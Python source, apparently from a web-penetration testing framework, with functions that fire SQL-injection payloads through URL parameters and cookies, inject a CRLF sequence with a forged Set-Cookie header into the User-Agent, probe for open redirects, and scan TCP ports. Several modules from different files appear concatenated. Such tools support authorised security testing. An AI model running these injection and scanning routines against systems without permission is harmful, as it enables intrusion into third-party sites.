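        print(R + ' [-] Exception : ' + str(e))
    print(G + '\n [+] HTMLi Module Completed!')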
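def manual0x00(web, parallel, properties):
    """SQL-injection "manual mode": try each entry of ``pay`` on one URL parameter.

    The injectable endpoint comes from ``properties["PARAM"]`` or a prompt.  When
    the query string holds several parameters the user names the one to use;
    its current value (``param1``) is kept and the remainder (``bug2``) is
    re-appended after each payload.  A payload is recorded as a hit when the
    response body length differs from the baseline request's -- a weak signal on
    pages whose content varies between requests.  Results go to ``save_data``
    and stdout.  An endpoint without ``?`` and ``=`` triggers a recursive
    re-prompt.

    Args:
        web: Base URL.
        parallel: Spread ``pay`` over a ``Pool`` of ``processes`` workers running
            ``manualpre`` instead of looping here.
        properties: Option table; only ``properties["PARAM"][1]`` is read.

    Returns:
        None.  Calls ``sys.exit`` when the chosen parameter is not in the path.
    """
    print(R + '\n     S Q L i  (Manual Mode)')
    print(R + '    ---<>----<>----<>----<>-\n')

    # Named vsession so the local no longer shadows the ``requests`` module name.
    vsession = session()
    if properties["PARAM"][1] == " ":
        bug = input(O + ' [§] Injectable Endpoint ' + R +
                    '(eg. /sqli/fetch.php?id=2)' + O + ' :> ')
    else:
        bug = properties["PARAM"][1]
    bugs = web + bug
    # Baseline response.  verify=False disables TLS certificate validation, as
    # in the original; note that an on-path tamperer could then alter the
    # baseline the length comparison relies on.
    getrq = vsession.get(bugs, timeout=7, verify=False)

    choice = ""
    if "&" in bug:
        ln = len(bug.split("&"))
        choice = input(
            " [!] Discovered {} parameters. Which one to use? (enter name) :> "
            .format(ln))
        if choice not in bug:
            sys.exit(" [-] Param {} not found.".format(choice))

    bug2 = ""
    param1 = ""
    if choice != "":
        n = bug.split(choice + "=")[1]
        if "&" in n:
            bug2 = bug.split(choice + "=")[1]
            param1 = bug2.split("&")[0]
            bug2 = bug2.replace(param1, "")

    bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1

    print(O + ' [!] Using Url : ' + GR + bugs)
    if '?' in bugs and '=' in bugs:
        success = []
        if not parallel:
            for p in pay:
                bugged = bugs + str(p) + bug2
                print(B + " [*] Trying : " + C + bugged)
                sleep(0.7)
                # Same timeout as the baseline so a stalled target cannot hang
                # the loop; certificate verification stays at the library
                # default here, as it did before.
                response = vsession.get(bugged, timeout=7)
                if len(response.content) != len(getrq.content):
                    print('\n' + G + ' [+] Vulnerable link detected : ' + bugs)
                    print(GR + ' [*] Injecting payloads...')
                    print(B + ' [!] PoC : ' + str(bugged))
                    print(R + " [!] Payload : " + O + p + '\033[0m')
                    print("\033[1m [!] Code Snippet :\n \033[0m" +
                          str(response) + '\n')
                    success.append(p)
        else:
            paylists = listsplit(pay, round(len(pay) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(manualpre, args=(
                        bugs,
                        bug2,
                        l,
                        getrq,
                    )) for l in paylists
                ]
                for job in res:
                    success += job.get()
        if success:
            data = "SQLi Vulnerability found!\nVulnerable Link: " + bugs + "\nSuccessful payloads: " + str(
                success)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(" [+] SQLi Vulnerability found! Successful payloads:")
            for hit in success:
                print(hit)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "(manual) no payload succeeded.")
            print(R + "\n [-] No payload succeeded." + C)
    else:
        # Recursion re-runs the whole prompt sequence; there is no retry cap.
        print(R + ' [-] Enter an URL with scope parameter...')
        manual0x00(web, parallel, properties)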
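def crlf(web):
    """CRLF-injection check of *web*: header based first, then parameter based.

    Sets the module-level reporting globals (name, module, lvl1..lvl3), sends
    one request whose User-Agent carries an encoded CR/LF pair followed by a
    Set-Cookie header and passes the response headers to ``check0x00``.  It
    then repeats the check for every entry of the module-level ``payloads``
    placed into the chosen URL parameter, sequentially or through ``checkpre``
    in a ``Pool`` of ``processes`` workers.  Findings are printed and stored
    with ``save_data``.

    Args:
        web: Base URL; the scope parameter path is appended to it.

    Returns:
        None.  Exceptions raised during the parameter phase are printed, not
        re-raised.
    """
    global name
    name = targetname(web)
    global lvl2
    lvl2 = inspect.stack()[0][3]
    global module
    module = "VulnAnalysis"
    global lvl1
    lvl1 = "Critical Vulnerabilities"
    global lvl3
    lvl3 = ""
    time.sleep(0.5)
    from core.methods.print import pvln
    pvln("CRLF Injection")

    gen_headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close'
    }
    inf_headers = {
        'User-Agent':
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201%0d%0aSet-Cookie: Infected_by=Drake',
        'Accept-Language': 'en-US;',
        'Accept-Encoding': 'gzip, deflate',
        'Accept': 'text/html,application/xhtml+xml,application/xml;',
        'Connection': 'close'
    }
    print(GR + ' [*] Testing response to normal requests...')
    time.sleep(0.5)
    print(O + ' [*] Setting header values...')
    time.sleep(0.7)

    print(O + ' [*] Initiating ' + R + 'User-Agent Based Check...')
    time.sleep(0.5)
    print(B + ' [+] Injecting CRLF in User-Agent Based value : ' + C +
          '%0d%0a ...')
    time.sleep(0.7)

    print(O + ' [*] Using !nfected UA Value : ' + inf_headers['User-Agent'])
    m = getHeaders0x00(web, inf_headers)
    success = []
    # Hand check0x00 the exact value that was sent instead of a second copy of
    # the literal, so the two can no longer drift apart.
    success += check0x00(m, inf_headers['User-Agent'])
    print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...')
    if properties["PARAM"][1] == " ":
        param = input(O +
                      ' [§] Scope parameter (eg. /vuln/page.php?crlf=x) :> ')
    else:
        param = properties["PARAM"][1]
    if not param.startswith('/'):
        param = '/' + param

    if properties["PARALLEL"][1] == " ":
        pa = input("\n [?] Parallelise Attack? (enter if not) :> ")
        parallel = pa != ""
    else:
        parallel = properties["PARALLEL"][1] == "1"

    # Presumably loads the module-level ``payloads``; its return value was never
    # used, so it is not bound.
    getFile0x00()
    web0 = web + param
    # Everything after the first '=' is dropped, so only the first query
    # parameter receives payloads.
    web00 = web0.split('=')[0] + '='
    try:
        if not parallel:
            for pay in payloads:
                web0x00 = web00 + pay
                print(C + ' [+] Using payload : ' + B + str(pay))
                print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00))
                p = getHeaders0x00(web0x00, gen_headers)
                success += check0x00(p, pay)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(checkpre, args=(
                        l,
                        web00,
                        gen_headers,
                    )) for l in paylists
                ]
                for job in res:
                    success += job.get()
        if success:
            data = "CRLF Injection Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str(
                success)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
            print(
                " [+] CRLF Injection Vulnerability found! Successful payloads:"
            )
            for hit in success:
                print(hit)
        else:
            print(R + "\n [-] No payload succeeded." + C)
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No payload succeeded.")
    except Exception as e:
        print(R + ' [-] Unexpected Exception Encountered!')
        print(R + ' [-] Exception : ' + str(e))
    print(G + ' [+] CRLF Module Completed!')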
    def sqlicookie0x00(web, parallel):
        """Cookie-based SQL-injection check against *web*.

        Fetches *web* once through a fresh ``session()``; if the server set any
        cookies, each entry of the module-level ``pay`` list is appended to every
        cookie value and the page is fetched again.  A payload counts as a hit
        when the response length differs from the baseline -- a weak signal on
        pages whose content changes between requests.  Parallel mode hands
        payload chunks to ``cookiepre`` in a ``Pool`` of ``processes`` workers.
        Findings are printed and passed to ``save_data``.

        Args:
            web: URL to request.
            parallel: Use the process pool instead of the in-process loop.

        Returns:
            None.
        """

        #print(R+'\n    =========================')
        print(R + '\n     S Q L i  (Cookie Based)')
        print(R + '    ---<>----<>----<>----<>--\n')

        sleep(0.5)
        vsession = session()
        # Baseline request; its content length is the comparison reference.
        req = vsession.get(web)
        if vsession.cookies:
            print(G + ' [+] This website supports session cookies...')
            success = []
            if not parallel:
                for i in pay:
                    print(B + " [*] Trying Payload : " + C + '' + i)
                    time.sleep(0.7)
                    for cookie in vsession.cookies:
                        # NOTE(review): the jar's cookie object is mutated in place
                        # and never restored, so every later request carries all
                        # earlier payloads as well -- confirm that is intended.
                        cookie.value += i
                        print(O + ' [+] Using ' + R + '!nfected' + O +
                              ' cookie : ' + GR + cookie.value)
                        r = vsession.get(web)
                        if len(r.content) != len(req.content):
                            poc = C + " [+] PoC : " + O + cookie.name + " : " + GR + cookie.value
                            print(
                                G +
                                " [+] Blind Based SQli (Cookie Based) Detected! "
                            )
                            print(poc)
                            print(P + ' [+] Code : ' + W + str(r.text) + '\n')
                            success.append(i)
            else:
                paylists = listsplit(pay, round(len(pay) / processes))
                with Pool(processes=processes) as pool:
                    # Each worker gets the session, URL, its payload chunk and the
                    # baseline response, and returns the payloads it flagged.
                    res = [
                        pool.apply_async(cookiepre,
                                         args=(
                                             vsession,
                                             web,
                                             l,
                                             req,
                                         )) for l in paylists
                    ]
                    #res1 = pool.apply_async(portloop, )
                    for i in res:
                        j = i.get()
                        success += j
            if success:
                data = "SQLi Vulnerability (Cookie) found!\nSuccessful payloads: " + str(
                    success)
                save_data(database, module, lvl1, lvl2, lvl3, name, data)
                print(
                    " [+] SQLi Vulnerability (Cookie) found! Successful payloads:"
                )
                for i in success:
                    print(i)
            else:
                print(R + "\n [-] No payload succeeded." + C)
                save_data(database, module, lvl1, lvl2, lvl3, name,
                          "(cookie) no payload succeeded.")
        else:
            # Nothing to inject into: the baseline response set no cookies.
            print(R + ' [-] No support for cookies...')
            time.sleep(0.5)
            print(R + ' [-] Cookie based injection not possible...')
            data = "No support for cookies. Cookie based injection not possible."
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
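def service0x00(host):
    """Scan a port range on *host* and print a PORT / STATE / SERVICE table.

    Port bounds come from ``properties["INIT"]`` / ``properties["FIN"]`` or
    prompts; ``properties["VERBOSE"]`` controls extra progress output.  The
    range is split across a ``Pool`` of ``processes`` workers running
    ``portloop``, each returning a pair whose first item holds open ports and
    second holds closed ones.  Open ports are labelled with ``get_servicev``
    ("Unknown" when it returns nothing), passed to ``summary`` / ``save_data``
    and printed one row at a time.

    Args:
        host: Hostname or IP address; must resolve via ``socket.gethostbyname``.

    Returns:
        None.  Calls ``quit()`` on an unresolvable host, a non-numeric or
        out-of-range port bound, or Ctrl-C.
    """
    from core.methods.print import pscan
    pscan("service detection")
    if properties["INIT"][1] == " ":
        start_port = input(C + ' [§] Enter initial port :> ')
    else:
        start_port = properties["INIT"][1]
    if properties["FIN"][1] == " ":
        end_port = input(C + ' [§] Enter ending port :> ')
    else:
        end_port = properties["FIN"][1]

    # Non-numeric input used to escape as an uncaught ValueError; reject it,
    # and an inverted or out-of-range pair, the way the other scanners do.
    try:
        start_port = int(start_port)
        end_port = int(end_port)
    except ValueError:
        print(R + ' [-] Port numbers must be integers... Exiting...')
        quit()
    if not 0 <= start_port <= end_port <= 65535:
        print(R + "\n [!] Invalid Range of Ports")
        print(" [!] Exiting...")
        quit()

    open_ports = []
    closed_ports = []

    try:
        # Only resolvability matters here; the workers are given ``host`` itself.
        socket.gethostbyname(host)
        print(G + '\n [+] Target server detected up and running...' + C + color.TR2 + C)
        print(O + ' [*] Preparing for scan...' + C)
    except Exception:
        print(R + ' [-] Server not responding...')
        time.sleep(0.3)
        print(R + ' [*] Exiting...')
        quit()

    if properties["VERBOSE"][1] == " ":
        mn = input(C + '\n [?] Do you want a verbose output (enter if not) :> ')
        verbose = mn != ""
    else:
        verbose = properties["VERBOSE"][1] == "1"
    if verbose:
        print(P + '\n [+] Verbose mode selected !\n')
        print(GR + " [!] Scanning %s from port %s - %s: " % (host, start_port, end_port))
    print(G + " [*] Scanning started at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
    starting_time = time.time()
    try:
        if verbose:
            print(O + " [*] Scan in progress.." + C)
            time.sleep(0.8)
        portrange = range(start_port, end_port + 1)
        prtlst = listsplit(portrange, round(len(portrange) / processes))
        with Pool(processes=processes) as pool:
            res = [pool.apply_async(portloop, args=(l, host, verbose,)) for l in prtlst]
            for job in res:
                found_open, found_closed = job.get()
                open_ports += found_open
                closed_ports += found_closed

        print(G + "\n [+] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        total_time = time.time() - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)
        openports = "   {}{}{}{}{}{}{}{} ports open.".format(color.TR5, C, G, str(len(open_ports)), color.END, color.TR2, color.END, color.CURSIVE)
        summary("servicedetect", openports)
        print()

        print(P + '    +--------+----------+-----------+')
        print(P + '    |  ' + C + 'PORT  ' + P + '|  ' + C + 'STATE   ' + P + '|  ' + C + 'SERVICE  ' + P + '|')
        print(P + '    +--------+----------+-----------+')

        if open_ports:
            data = "Port:Service >>\n"
            for port in sorted(open_ports):
                label = str(get_servicev(port) or "Unknown")
                cell = str(port)
                data = data + "\n" + cell + ":" + label
                _service_table_row(cell, label)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name, "No open ports found.")
            print(R + "\n [-] No open ports found.!!\n")
        print(B + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (host, total_time) + C + color.TR2 + C + "\n")

    except KeyboardInterrupt:
        print(R + "\n [-] User requested shutdown... ")
        print(' [-] Exiting...\n')
        quit()


def _service_table_row(cell, label):
    """Print one PORT / STATE / SERVICE row followed by its separator line.

    *cell* is the port as a string and *label* the service name.  The port is
    centred in the 8-column cell, which reproduces the spacing the former
    per-digit-count branches produced for 2-5 digit ports and fixes the
    one-digit case, whose service column was one space short.
    """
    print(P + '    |' + C + cell.center(8) + P + '|   ' + C + 'OPEN   ' + P + '|   ' + C + label)
    print(P + '    +--------+----------+-----------+')
    time.sleep(0.2)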
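def scan0x00(target):
    """TCP connect scan of *target* over a user-chosen port range.

    Reads the bounds from ``properties["INIT"]`` / ``properties["FIN"]`` (or
    prompts), validates them, splits the range across a ``Pool`` of
    ``processes`` workers running ``portloop`` -- each returning a pair of
    open-port and closed-port lists -- and prints a PORT / STATE table of the
    open ports together with timing information.

    Args:
        target: Hostname or IP address; resolved with ``socket.gethostbyname``.

    Returns:
        None.  Calls ``quit()`` on an invalid range; any other exception
        (including a non-numeric bound or a resolution failure) is printed and
        also ends in ``quit()``.
    """
    try:
        from core.methods.print import pscan
        pscan("tcp connect scan")
        if properties["INIT"][1] == " ":
            min_port = input(C + ' [§] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(C + ' [§] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        open_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(
                C + ' [?] Do you want a verbose output? (enter if not) :> ')
            # The original ``chk is not ""`` compared identity, not content.
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"
        print(GR + ' [*] Checking port range...')
        # A non-numeric bound raises here and lands in the outer handler.
        lo = int(min_port)
        hi = int(max_port)
        # 65535 is the highest valid TCP port; the old bound of 65536 let the
        # range include a port number that cannot exist.
        if 0 <= lo <= hi <= 65535:
            print(P + ' [!] Port range detected valid...' + C)
            time.sleep(0.3)
            print(GR + ' [*] Preparing for the scan...')

            ports = range(lo, hi + 1)
            prtlst = listsplit(ports, round(len(ports) / processes))
            starting_time = time.time()

            checkhost(ip_host)
            print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") +
                  "!" + C + color.TR2 + C + "\n")

            with Pool(processes=processes) as pool:
                res = [
                    pool.apply_async(portloop, args=(
                        l,
                        verbose,
                        ip_host,
                    )) for l in prtlst
                ]
                for job in res:
                    found_open, found_closed = job.get()
                    open_ports += found_open
                    closed_ports += found_closed

            print(G + "\n [!] Scanning completed at %s" %
                  (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
            total_time = time.time() - starting_time
            print(P + ' [*] Preparing report...\n' + C)
            time.sleep(1)
            openports = "   {}{}{}{}{}{}{}{} ports open.".format(
                color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
                color.END, color.CURSIVE)
            summary("tcp connect", openports)
            print()
            print(P + '    +--------+------------------+')
            print(P + '    |  ' + GR + 'PORT  ' + P + '|       ' + C +
                  'STATE      ' + P + '|')
            print(P + '    +--------+------------------+')

            if open_ports:
                _print_open_port_rows(open_ports)
                print('')
            else:
                print(R + ' [-] No open ports found!')

            print(B + ' [!] ' + str(len(closed_ports)) +
                  ' closed ports not shown')
            print(G + " [+] Host %s scanned in %s seconds" %
                  (target, total_time) + C + color.TR2 + C + "\n")

        else:  # Bounds parsed but do not form a valid range
            print(R + "\n [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()
    except Exception as e:  # quit() raises SystemExit, which is not caught here
        print(e)
        quit()


def _print_open_port_rows(open_ports):
    """Print one PORT / STATE table row per open port, smallest first.

    The port is centred in the 8-column cell, which matches the spacing the
    former per-digit-count branches produced for 1-5 digit port numbers.
    """
    for port in sorted(open_ports):
        cell = str(port).center(8)
        print(P + '    |' + C + cell + P + '|       ' + C + 'OPEN       ' + P + '|')
        print(P + '    +--------+------------------+')
        time.sleep(0.2)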
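def scan0x00(target):
    """TCP stealth scan of *target* over a user-chosen port range.

    Reads the bounds from ``properties["INIT"]`` / ``properties["FIN"]`` (or
    prompts), validates them, splits the range across a ``Pool`` of
    ``processes`` workers running ``portloop`` -- each returning a pair of
    open-port and closed-port lists -- prints a PORT / STATE table of the open
    ports and records them through ``summary`` and ``save_data``.

    Args:
        target: Hostname or IP address; resolved with ``socket.gethostbyname``
            for the workers, while ``checkhost`` receives the name as given.

    Returns:
        None.  Calls ``quit()`` on a non-numeric or invalid port range and on
        Ctrl-C.
    """
    try:
        from core.methods.print import pscan
        pscan("tcp stealth scan")
        if properties["INIT"][1] == " ":
            min_port = input(C + ' [§] Enter initial port :> ')
        else:
            min_port = properties["INIT"][1]
        if properties["FIN"][1] == " ":
            max_port = input(C + ' [§] Enter ending port :> ')
        else:
            max_port = properties["FIN"][1]
        open_ports = []
        closed_ports = []
        ip_host = socket.gethostbyname(target)
        if properties["VERBOSE"][1] == " ":
            chk = input(
                C + ' [?] Do you want a verbose output? (enter if not) :> ')
            verbose = chk != ""
        else:
            verbose = properties["VERBOSE"][1] == "1"

        try:
            print(GR + ' [*] Checking port range...')
            # int() is converted once; a non-numeric bound is caught below.
            lo = int(min_port)
            hi = int(max_port)
            # 65535 is the highest valid TCP port; the old bound of 65536 let
            # the range include a port number that cannot exist.
            if 0 <= lo <= hi <= 65535:
                print(P + ' [!] Port range detected valid...' + C)
                time.sleep(0.3)
                print(GR + ' [*] Preparing for the scan...')
            else:
                print(R + "\n [!] Invalid Range of Ports")
                print(" [!] Exiting...")
                quit()
        except Exception:
            print(R + "\n [!] Invalid Range of Ports")
            print(" [!] Exiting...")
            quit()

        ports = range(lo, hi + 1)
        prtlst = listsplit(ports, round(len(ports) / processes))
        starting_time = time.time()

        checkhost(target)
        print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") + "!" +
              C + color.TR2 + C + "\n")

        with Pool(processes=processes) as pool:
            res = [
                pool.apply_async(portloop, args=(
                    l,
                    verbose,
                    ip_host,
                )) for l in prtlst
            ]
            for job in res:
                found_open, found_closed = job.get()
                open_ports += found_open
                closed_ports += found_closed

        print(G + "\n [!] Scanning completed at %s" %
              (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C)
        total_time = time.time() - starting_time
        print(P + ' [*] Preparing report...\n' + C)
        time.sleep(1)
        openports = "   {}{}{}{}{}{}{}{} ports open.".format(
            color.TR5, C, G, str(len(open_ports)), color.END, color.TR2,
            color.END, color.CURSIVE)
        summary("tcp stealth", openports)
        print()
        print(P + '    +--------+------------------+')
        print(P + '    |  ' + GR + 'PORT  ' + P + '|       ' + C +
              'STATE      ' + P + '|')
        print(P + '    +--------+------------------+')
        if open_ports:
            _print_open_port_rows(open_ports)
            print('')
            data = "Open Ports: " + str(open_ports)
            save_data(database, module, lvl1, lvl2, lvl3, name, data)
        else:
            save_data(database, module, lvl1, lvl2, lvl3, name,
                      "No open ports found.")
            print(R + " [-] Sorry, No open ports found.!!")
        print(C + '\n [!] ' + str(len(closed_ports)) +
              ' closed ports not shown')
        print(G + " [+] Host %s scanned in %s seconds" % (target, total_time) +
              C + color.TR2 + C + "\n")

    except KeyboardInterrupt:
        print(R + "\n [-] User Requested Shutdown...")
        print(" [*] Exiting...")
        quit()


def _print_open_port_rows(open_ports):
    """Print one PORT / STATE table row per open port, smallest first.

    The port is centred in the 8-column cell, which matches the spacing the
    former per-digit-count branches produced for 1-5 digit port numbers.
    """
    for port in sorted(open_ports):
        cell = str(port).center(8)
        print(P + '    |' + C + cell + P + '|       ' + C + 'OPEN       ' + P + '|')
        print(P + '    +--------+------------------+')
        time.sleep(0.2)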
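def openredirect(web):
    """Interactively probe one URL parameter for open-redirect behaviour.

    Prompts for the scope parameter, an optional ``Cookie`` header and a
    payload file, then hands the assembled URL and the payload list to
    ``check0x00`` -- directly, or split across a process pool when the
    user asks for a parallel run -- and prints the payloads that succeeded.

    Args:
        web: Base URL (scheme and host) that the scope parameter is
            appended to.

    Returns:
        None. Findings are only printed; unlike sibling modules this one
        does not call ``save_data``.

    Raises:
        Nothing deliberately; ``KeyboardInterrupt`` is caught and reported.

    Relies on module-level names it does not define: ``payloads``
    (presumably populated by ``getPayloads0x00``), ``processes``,
    ``listsplit``, ``check0x00``, ``Pool`` and the colour constants
    ``GR``/``O``/``R``/``G``/``C`` -- confirm against the module header.
    """
    default_payload_file = 'files/payload-db/openredirect_payloads.lst'

    print(GR + ' [*] Loading module...')
    time.sleep(0.6)

    from core.methods.print import pvln
    pvln("open redirect checker")

    try:
        param = input(O + ' [#] Scope parameter to test (eg. /redirect.php?site=foo) :> ')
        if not ('?' in param and '=' in param):
            print(R + ' [-] Your input does not match a parameter...')
            param = input(O + ' [#] Enter paramter to test :> ')
        # Build the target URL *after* the possible re-prompt so that web00 is
        # always bound; previously the re-prompt path never assigned it and the
        # scan failed later with NameError.
        web00 = _scope_url(web, param)

        pa = input(" [?] Parallel Attack? (enter if not) :> ")
        # Equality, not identity: `is not ""` compares object identity with a
        # string literal, which is unspecified and a SyntaxWarning on 3.8+.
        parallel = pa != ""

        print(GR + ' [*] Configuring relative headers...')
        time.sleep(0.8)
        gen_headers = {'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201',
                       'Accept-Language': 'en-US;',
                       'Accept-Encoding': 'gzip, deflate',
                       'Accept': 'text/html,application/xhtml+xml,application/xml;',
                       'Connection': 'close'}

        print(O + ' [!] Enter path to payload file ' + R + '(Default: files/payload-db/openredirect_payloads.lst)')
        fi = input(O + ' [#] Your input (Press Enter if default) :> ')
        if fi == '':
            fi = default_payload_file
        elif os.path.exists(fi):
            print(G + ' [+] File found under ' + fi)
        else:
            print(R + ' [-] File not found... Using default payload...')
            fi = default_payload_file
        # Every branch ends up loading exactly one file, so load it once here.
        getPayloads0x00(fi)

        input_cookie = input("\n [#] Got any cookies? [just enter if none] :> ")
        if input_cookie:
            gen_headers['Cookie'] = input_cookie

        print(GR + ' [*] Configuring payloads with Url...')
        success = []
        if not parallel:
            # Keep the return value: the serial path used to discard it, so it
            # always reported "No payload succeeded" regardless of outcome.
            # The parallel branch below shows check0x00 returns a list.
            success += check0x00(web00, gen_headers, payloads)
        else:
            paylists = listsplit(payloads, round(len(payloads) / processes))
            with Pool(processes=processes) as pool:
                res = [pool.apply_async(check0x00, args=(web00, gen_headers, l))
                       for l in paylists]
                for y in res:
                    success += y.get()
        if success:
            print(" [+] Open Redirect Vulnerability found! Successful payloads:")
            for i in success:
                print(i)
        else:
            print(R + "\n [-] No payload succeeded." + C)
    except KeyboardInterrupt:
        print(R + ' [-] User Interruption Detected!')


def _scope_url(web, param):
    """Join *web* and *param* into the URL under test.

    A parameter starting with "/" is confirmed with the user, keeping the
    original prompt. Both "y" and "n" produced the same URL before, so the
    answer only decides whether the "U mad?" nudge is printed; an unexpected
    answer no longer leaves the URL unassigned.

    Args:
        web: Base URL.
        param: Path-plus-query string entered by the user.

    Returns:
        The concatenated target URL.
    """
    if not param.startswith('/'):
        return web + '/' + param
    m = input(GR + '\n [!] Your path starts with "/".\n [#] Do you mean root directory? (Y/n) :> ')
    if m not in ('y', 'n'):
        print(R + ' [-] U mad?')
    return web + param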